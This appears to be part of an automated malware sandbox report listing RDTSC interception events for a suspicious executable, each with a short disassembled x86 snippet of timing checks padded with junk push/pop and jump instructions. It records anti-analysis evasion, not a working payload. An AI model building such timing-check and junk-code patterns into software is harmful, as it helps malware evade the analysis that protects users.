        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: FA1B41 second address: FA1B6F instructions: 0x00000000 rdtsc 0x00000002 ja 00007FB8E4E1A516h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FB8E4E1A51Dh 0x00000011 jmp 00007FB8E4E1A525h 0x00000016 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: FA4CF2 second address: FA4CF8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: FA4CF8 second address: FA4CFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: FA4CFC second address: FA4D07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: FA47CC second address: FA47D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: FA4912 second address: FA491B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: FA491B second address: FA4932 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB8E4E1A523h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: FAA9A4 second address: FAA9AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: FAA9AA second address: FAA9AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: FAA9AF second address: FAA9FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007FB8E4E1E3B6h 0x00000009 jmp 00007FB8E4E1E3C9h 0x0000000e popad 0x0000000f jmp 00007FB8E4E1E3C6h 0x00000014 pop edx 0x00000015 pop eax 0x00000016 pushad 0x00000017 jmp 00007FB8E4E1E3BEh 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: FAA9FC second address: FAAA08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FB8E4E1A516h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: FAAB47 second address: FAAB4C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: FAACAD second address: FAACB6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: FAAE00 second address: FAAE11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 js 00007FB8E4E1E3B6h 0x0000000d push eax 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: FAAE11 second address: FAAE2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007FB8E4E1A524h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: FAAF9A second address: FAAFB5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 jbe 00007FB8E4E1E3B6h 0x0000000d popad 0x0000000e push eax 0x0000000f push edi 0x00000010 pop edi 0x00000011 pop eax 0x00000012 pop edx 0x00000013 pop eax 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: FAAFB5 second address: FAAFD1 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FB8E4E1A516h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FB8E4E1A51Fh 0x0000000f push esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F4F5B5 second address: F4F5BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F4F5BF second address: F4F62B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ecx 0x0000000b call 00007FB8E4E1A518h 0x00000010 pop ecx 0x00000011 mov dword ptr [esp+04h], ecx 0x00000015 add dword ptr [esp+04h], 0000001Ah 0x0000001d inc ecx 0x0000001e push ecx 0x0000001f ret 0x00000020 pop ecx 0x00000021 ret 0x00000022 mov ebx, dword ptr [ebp+12478607h] 0x00000028 add edi, dword ptr [ebp+122D2A9Fh] 0x0000002e add eax, ebx 0x00000030 push 00000000h 0x00000032 push ebx 0x00000033 call 00007FB8E4E1A518h 0x00000038 pop ebx 0x00000039 mov dword ptr [esp+04h], ebx 0x0000003d add dword ptr [esp+04h], 0000001Ch 0x00000045 inc ebx 0x00000046 push ebx 0x00000047 ret 0x00000048 pop ebx 0x00000049 ret 0x0000004a mov dword ptr [ebp+122D3895h], eax 0x00000050 push eax 0x00000051 jo 00007FB8E4E1A524h 0x00000057 pushad 0x00000058 push eax 0x00000059 push edx 0x0000005a rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: FABC20 second address: FABC3B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FB8E4E1E3BDh 0x0000000b js 00007FB8E4E1E3C2h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: FABC3B second address: FABC50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FB8E4E1A516h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jne 00007FB8E4E1A518h 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: FABC50 second address: FABC6A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB8E4E1E3C4h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: FABC6A second address: FABC6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: FABC6E second address: FABC72 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: FABC72 second address: FABC86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FB8E4E1A516h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jo 00007FB8E4E1A522h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: FABC86 second address: FABC8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: FAED98 second address: FAEDBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FB8E4E1A516h 0x0000000a jmp 00007FB8E4E1A524h 0x0000000f popad 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: FAEDBA second address: FAEDC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: FAE6B2 second address: FAE6C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007FB8E4E1A516h 0x00000009 push edi 0x0000000a pop edi 0x0000000b jno 00007FB8E4E1A516h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: FB2003 second address: FB2013 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FB8E4E1E3BAh 0x0000000b rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: FB9D23 second address: FB9D75 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB8E4E1A529h 0x00000008 jnc 00007FB8E4E1A516h 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 pushad 0x00000012 jmp 00007FB8E4E1A527h 0x00000017 jno 00007FB8E4E1A516h 0x0000001d jg 00007FB8E4E1A516h 0x00000023 popad 0x00000024 pop edx 0x00000025 pop eax 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: FB9D75 second address: FB9D79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: FB9D79 second address: FB9D8F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jg 00007FB8E4E1A516h 0x0000000d jnp 00007FB8E4E1A516h 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: FB9D8F second address: FB9DA2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB8E4E1E3BFh 0x00000009 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: FB7C29 second address: FB7C2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: FB7C2F second address: FB7C35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: FB7C35 second address: FB7C40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FB8E4E1A516h 0x0000000a popad 0x0000000b rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: FB7F64 second address: FB7F68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: FB7F68 second address: FB7F96 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FB8E4E1A52Dh 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007FB8E4E1A525h 0x0000000f jbe 00007FB8E4E1A518h 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push edi 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: FB7F96 second address: FB7F9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: FB886E second address: FB888A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB8E4E1A526h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: FB888A second address: FB8892 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: F4F92D second address: F4F931 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: FB96E8 second address: FB96EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: FB96EE second address: FB971B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB8E4E1A526h 0x00000009 popad 0x0000000a push ecx 0x0000000b jmp 00007FB8E4E1A520h 0x00000010 pop ecx 0x00000011 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: FB971B second address: FB9720 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: FB9720 second address: FB9739 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jg 00007FB8E4E1A51Ah 0x0000000b pushad 0x0000000c popad 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: FB9739 second address: FB973F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: FB973F second address: FB9744 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: FBFD56 second address: FBFD5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: FBFD5B second address: FBFD72 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB8E4E1A523h 0x00000009 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: FBFD72 second address: FBFD7F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: FBFD7F second address: FBFD89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FB8E4E1A516h 0x0000000a rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: FBEDB9 second address: FBEDC5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 pushad 0x0000000a popad 0x0000000b pop ecx 0x0000000c rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: FBF093 second address: FBF0D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pushad 0x00000006 popad 0x00000007 jmp 00007FB8E4E1A524h 0x0000000c popad 0x0000000d jnl 00007FB8E4E1A520h 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FB8E4E1A520h 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: FBF0D7 second address: FBF0ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB8E4E1E3C2h 0x00000009 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: FBF0ED second address: FBF0F3 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: FBF405 second address: FBF40F instructions: 0x00000000 rdtsc 0x00000002 js 00007FB8E4E1E3BEh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: FBF40F second address: FBF42F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007FB8E4E1A523h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: FBF42F second address: FBF433 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: FBF571 second address: FBF588 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB8E4E1A51Eh 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: FBF705 second address: FBF709 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: FBF709 second address: FBF72A instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FB8E4E1A516h 0x00000008 jmp 00007FB8E4E1A527h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: FBF72A second address: FBF735 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007FB8E4E1E3B6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: FBF735 second address: FBF73B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: FBF73B second address: FBF74E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FB8E4E1E3B6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jne 00007FB8E4E1E3B6h 0x00000013 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: FBF74E second address: FBF79C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB8E4E1A51Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c jns 00007FB8E4E1A539h 0x00000012 pushad 0x00000013 jmp 00007FB8E4E1A51Fh 0x00000018 push ebx 0x00000019 pop ebx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: FBFA59 second address: FBFA5E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: FBFA5E second address: FBFA7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FB8E4E1A526h 0x0000000c rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: FBFA7B second address: FBFAAC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB8E4E1E3BDh 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FB8E4E1E3C6h 0x00000016 push ebx 0x00000017 pop ebx 0x00000018 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: FBFAAC second address: FBFABE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB8E4E1A51Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: FBFABE second address: FBFAC3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: FC46CB second address: FC46E8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB8E4E1A525h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: FC46E8 second address: FC46EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: FCBAE0 second address: FCBB07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 pushad 0x00000007 popad 0x00000008 jno 00007FB8E4E1A516h 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push edx 0x00000012 pop edx 0x00000013 jmp 00007FB8E4E1A524h 0x00000018 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: FCBB07 second address: FCBB11 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FB8E4E1E3B6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: FCBFBB second address: FCBFD9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FB8E4E1A51Eh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e pop edx 0x0000000f je 00007FB8E4E1A516h 0x00000015 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: FCBFD9 second address: FCC01F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FB8E4E1E3BBh 0x0000000b popad 0x0000000c jng 00007FB8E4E1E41Fh 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FB8E4E1E3C9h 0x00000019 jmp 00007FB8E4E1E3C3h 0x0000001e rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: FCC1B8 second address: FCC1D0 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FB8E4E1A516h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jnl 00007FB8E4E1A51Eh 0x00000010 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: FCC1D0 second address: FCC1DD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007FB8E4E1E3B6h 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: FCC335 second address: FCC33B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: FCC33B second address: FCC341 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: FCC341 second address: FCC345 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: FCC345 second address: FCC354 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FB8E4E1E3B6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: FCC4F1 second address: FCC4F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: FCC4F5 second address: FCC503 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b pop edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeRDTSC instruction interceptor: First address: FCC503 second address: FCC52A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB8E4E1A51Dh 0x00000007 jmp 00007FB8E4E1A526h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
